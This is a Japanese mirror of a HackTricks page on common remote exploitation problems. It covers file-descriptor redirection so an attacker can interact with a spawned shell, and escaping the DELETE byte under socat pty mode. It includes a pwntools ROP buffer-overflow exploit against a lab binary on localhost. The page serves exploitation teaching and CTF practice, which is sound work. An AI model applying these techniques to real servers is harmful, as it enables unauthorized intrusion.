mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
57 lines
4.5 KiB
Markdown
57 lines
4.5 KiB
Markdown
|
# 一般的な攻撃問題
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じて、ゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
|||
|
|
|||
|
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|||
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
|
|||
|
* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
|
|||
|
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
|||
|
* **ハッキングテクニックを共有するために、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
|
|||
|
|
|||
|
</details>
|
|||
|
|
|||
|
## リモートエクスプロイテーションにおけるFDs
|
|||
|
|
|||
|
たとえば、リモートサーバーに**`system('/bin/sh')`**を呼び出すエクスプロイトを送信すると、これはもちろんサーバープロセスで実行され、`/bin/sh`はstdin(FD:`0`)からの入力を期待し、stdoutおよびstderr(FDs `1`および`2`)に出力を表示します。したがって、攻撃者はシェルと対話することができません。
|
|||
|
|
|||
|
これを修正する方法は、サーバーが起動したときに**FD番号`3`**(リスニング用)を作成し、その後、接続が**FD番号`4`**になると仮定することです。したがって、シェルに連絡を取ることが可能になります。
|
|||
|
|
|||
|
[**ここからのエクスプロイト例**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit)
|
|||
|
```python
|
|||
|
from pwn import *
|
|||
|
|
|||
|
elf = context.binary = ELF('./vuln')
|
|||
|
p = remote('localhost', 9001)
|
|||
|
|
|||
|
rop = ROP(elf)
|
|||
|
rop.raw('A' * 40)
|
|||
|
rop.dup2(4, 0)
|
|||
|
rop.dup2(4, 1)
|
|||
|
rop.win()
|
|||
|
|
|||
|
p.sendline(rop.chain())
|
|||
|
p.recvuntil('Thanks!\x00')
|
|||
|
p.interactive()
|
|||
|
```
|
|||
|
## Socat & pty
|
|||
|
|
|||
|
socatは既に**`stdin`**と**`stdout`**をソケットに転送しています。ただし、`pty`モードには**DELETE文字が含まれています**。したがって、`\x7f`(`DELETE` -)を送信すると、エクスプロイトの前の文字が**削除**されます。
|
|||
|
|
|||
|
これをバイパスするには、**`\x7f`を送信する前にエスケープ文字`\x16`を付加する必要があります**。
|
|||
|
|
|||
|
**ここでは**[**この動作の例を見つけることができます**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**。**
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary><strong>htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong>!</strong></summary>
|
|||
|
|
|||
|
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|||
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを発見
|
|||
|
* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れる
|
|||
|
* **💬**[**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
|||
|
* **ハッキングトリックを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **および**[**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
|
|||
|
|
|||
|
</details>
|